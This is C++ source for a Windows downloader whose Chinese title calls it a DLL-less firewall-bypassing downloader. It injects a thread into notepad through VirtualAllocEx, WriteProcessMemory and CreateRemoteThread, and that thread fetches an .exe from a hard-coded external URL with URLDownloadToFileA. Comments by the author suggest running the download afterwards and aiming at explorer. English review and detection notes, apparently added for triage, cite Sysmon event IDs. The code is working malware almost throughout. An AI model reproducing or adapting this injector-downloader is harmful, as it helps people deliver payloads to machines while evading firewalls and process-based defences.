无DLL 穿防火墙下载者
#include <windows.h>
#define MAXINJECTSIZE (1024*4)
// Parameter block for the injected thread. HideDownFile() fills it in the
// injecting process and copies it byte-for-byte into the target process with
// WriteProcessMemory; ThreadDown() then takes every string and every function
// address it uses from that copy.
// NOTE(review): the string literals and strcpy/lstrcpy calls elsewhere in this
// file only fit an ANSI build (TCHAR == char) - confirm.
struct tagDownInfo
{
// URL to fetch; set by main(), passed to the download call in ThreadDown().
TCHAR szUrl[500];
// Local path the download is written to; set by main().
TCHAR szFile[500];
// Name of the library that exports the download function ("Urlmon.dll").
TCHAR szUrlmon[30];
// Name of the download export ("URLDownloadToFileA").
TCHAR szUrlDowndToFile[30];
// Name of the message-box export ("MessageBoxA").
TCHAR szMessageBox[500];
// Name of the library that exports the message box ("User32.dll").
// NOTE(review): "User32.dll" is 10 characters plus a terminator, so the
// lstrcpy in HideDownFile() writes one element past this 10-element array.
TCHAR szUser32_lib[10];
// Not referenced by any code shown in this file.
bool bIsRun;
// Not referenced by any code shown in this file.
DWORD dwRunMode;
// Addresses of GetModuleHandleA, GetProcAddress and LoadLibraryA, resolved by
// HideDownFile() in the injecting process and called from inside the target.
FARPROC funFunGetModuleHandleAddr;
FARPROC funFunGetProcAddressAddr;
FARPROC funFunLoadLibraryAddr;
};
bool HideDownFile(tagDownInfo* pInfo, DWORD dwProcessId);
// Thread routine that HideDownFile() copies into the target process and starts
// there with CreateRemoteThread. lParam is the address of the tagDownInfo copy
// inside the target. The body names no import and no string literal directly:
// every API address and every string comes from that block.
//
// Sequence: load the library named in szUser32_lib, look up szMessageBox and
// show a message box (text = szUrl, caption = szFile); load szUrlmon, look up
// szUrlDowndToFile and call it to fetch szUrl into szFile. Always returns 0;
// no module handle, resolved pointer or call result is checked.
//
// Detection: because this runs inside the target, the Urlmon.dll load, the
// outbound HTTP request and the new file on disk are attributed to the target
// process (notepad in main()) rather than to the injector. Image-load, network
// and file-create telemetry from a process that normally does none of these is
// the signal to alert on (Sysmon event IDs 7, 3 and 11).
DWORD WINAPI ThreadDown(LPVOID lParam)
{
tagDownInfo* pInfo = (tagDownInfo*)lParam;
// Local function-pointer types for the APIs reached through pInfo.
// T_GetProcAddress is declared as returning HMODULE; each result is cast to
// the pointer type actually needed. pSleep is declared but never used.
typedef long (__stdcall* T_MessageBox)(HWND,LPCTSTR,LPCTSTR,DWORD);
typedef long (__stdcall* T_URLDownloadToFile)(LPVOID,LPCTSTR,LPCTSTR,DWORD, LPVOID );
typedef HMODULE (__stdcall* T_GetProcAddress)(HMODULE ,LPCSTR);
typedef HMODULE (__stdcall* T_GetModuleHandle)(LPCTSTR);
typedef HMODULE (__stdcall* T_LoadLibrary)(LPCTSTR);
typedef void (__stdcall* pSleep)( DWORD dwMilliseconds);
// The three important function addresses (pGetModuleHandle is assigned but
// never called below).
T_GetModuleHandle pGetModuleHandle = (T_GetModuleHandle)pInfo->funFunGetModuleHandleAddr;
T_GetProcAddress pGetProcAddress = (T_GetProcAddress)pInfo->funFunGetProcAddressAddr;
T_LoadLibrary pLoadLibrary = (T_LoadLibrary)pInfo->funFunLoadLibraryAddr;
// Visible message box showing the URL and the destination path before the
// download starts.
HMODULE hUser32Dll = pLoadLibrary(pInfo->szUser32_lib );
T_MessageBox pMessageBox =(T_MessageBox)pGetProcAddress(hUser32Dll, pInfo->szMessageBox);
pMessageBox(NULL, pInfo->szUrl, pInfo->szFile, 0);
// The download itself: the library named in szUrlmon is loaded into the
// target, then the export named in szUrlDowndToFile is called.
HMODULE hDll = pLoadLibrary( pInfo->szUrlmon );
T_URLDownloadToFile pURLDownloadToFile = (T_URLDownloadToFile)pGetProcAddress( hDll, pInfo->szUrlDowndToFile);
pURLDownloadToFile(NULL, pInfo->szUrl, pInfo->szFile, 0, NULL);
return 0;
}
// Copies ThreadDown() and a filled-in tagDownInfo into the process identified
// by dwProcessId, starts the copy as a remote thread and waits for it to end.
//
// pInfo       - caller supplies szUrl and szFile; this function overwrites the
//               three function-address fields and the four name fields.
// dwProcessId - target process.
// Returns false when OpenProcess, either VirtualAllocEx, either
// WriteProcessMemory or CreateRemoteThread fails, true otherwise. The result of
// the remote thread itself is never inspected.
//
// Detection: the call chain below (OpenProcess with thread-create and VM
// rights on another process, VirtualAllocEx with PAGE_EXECUTE_READWRITE,
// WriteProcessMemory, CreateRemoteThread) is the classic remote-thread
// injection pattern. It shows up as process-access and CreateRemoteThread
// telemetry (Sysmon event IDs 10 and 8), and as a thread whose start address
// lies in private, non-image RWX memory of the target.
bool HideDownFile(tagDownInfo* pInfo, DWORD dwProcessId)
{
HANDLE hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE, FALSE, dwProcessId);
if(hProcess == NULL)
return false;
// Addresses are resolved in THIS process and later called inside the target,
// so the code assumes Kernel32.dll is mapped at the same address in both.
HINSTANCE hLibDll = GetModuleHandle("Kernel32.dll");
pInfo->funFunGetProcAddressAddr = (FARPROC)GetProcAddress(hLibDll, "GetProcAddress");
pInfo->funFunGetModuleHandleAddr = (FARPROC)GetProcAddress(hLibDll, "GetModuleHandleA");
pInfo->funFunLoadLibraryAddr=(FARPROC)GetProcAddress(hLibDll, "LoadLibraryA");
// Library and export names travel inside the parameter block so that the
// injected code needs no string literals of its own.
// NOTE(review): lstrcpy is unbounded; "User32.dll" plus its terminator is
// 11 elements and szUser32_lib holds 10.
lstrcpy(pInfo->szUrlmon, "Urlmon.dll");
lstrcpy(pInfo->szUrlDowndToFile, "URLDownloadToFileA");
lstrcpy(pInfo->szMessageBox, "MessageBoxA");
lstrcpy(pInfo->szUser32_lib, "User32.dll");
// Allocate memory in the target: one region for the code, one for the
// parameter block. Both are requested as PAGE_EXECUTE_READWRITE.
// Every early return from here on leaves hProcess open, and regions that were
// already allocated stay in the target.
void *pRemoteThread = VirtualAllocEx(hProcess, 0, MAXINJECTSIZE, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (! pRemoteThread)
return false;
tagDownInfo *pData = (tagDownInfo*)VirtualAllocEx(hProcess, 0, sizeof (tagDownInfo), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!pData)
return false;
// A fixed MAXINJECTSIZE bytes are copied starting at the address of
// ThreadDown, whatever the real length of that function is.
if (! WriteProcessMemory(hProcess, pRemoteThread, &ThreadDown, MAXINJECTSIZE, 0))
return false;
if (! WriteProcessMemory(hProcess, pData, pInfo, sizeof (tagDownInfo), 0))
return false;
bool bRet = true;
HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pRemoteThread, pData, 0, NULL);
// Failure is only recorded in bRet; the wait and CloseHandle below still run
// with a NULL hThread in that case.
if(!hThread)
bRet = false;
WaitForSingleObject(hThread, INFINITE);
VirtualFreeEx(hProcess, pRemoteThread, MAXINJECTSIZE, MEM_RELEASE);
VirtualFreeEx(hProcess, pData, sizeof (tagDownInfo), MEM_RELEASE);
// Author's note: add your own code here to run the downloaded program; it can
// also run in another thread, which only needs shell32.dll loaded as well.
CloseHandle(hThread);
CloseHandle(hProcess);
return bRet;
}
#include <windows.h>
#include "HideDownFile.CPP"
#include "conio.h"
// Demo driver: finds a window of class "notepad", takes the id of the process
// that owns it, fills in a URL and a destination path, and calls
// HideDownFile() on that process. The result of HideDownFile() is ignored and
// the program always returns 0.
// The hard-coded URL and output path below are the network and file
// indicators to look for when triaging this sample.
int main(int argc, char* argv[])
{
// ===== Obtain the process in which the remote thread will be created =====
// FindWindow's result is not checked; if no such window exists hWnd is NULL
// and dwProcessId is passed on without having been initialised here.
HWND hWnd = FindWindow("notepad", NULL); // Uses NOTEPAD as the example; a small change targets explorer instead
DWORD dwProcessId;
::GetWindowThreadProcessId(hWnd, &dwProcessId);
tagDownInfo info;
// Zero the block first; only szFile and szUrl are set here, the remaining
// name and address fields are filled in by HideDownFile().
ZeroMemory(&info, sizeof(tagDownInfo));
strcpy(info.szFile, "e://1.exe");
strcpy(info.szUrl, "http://www.shineway.com/aspnet/adsl.exe");
HideDownFile(&info, dwProcessId);
return 0;
}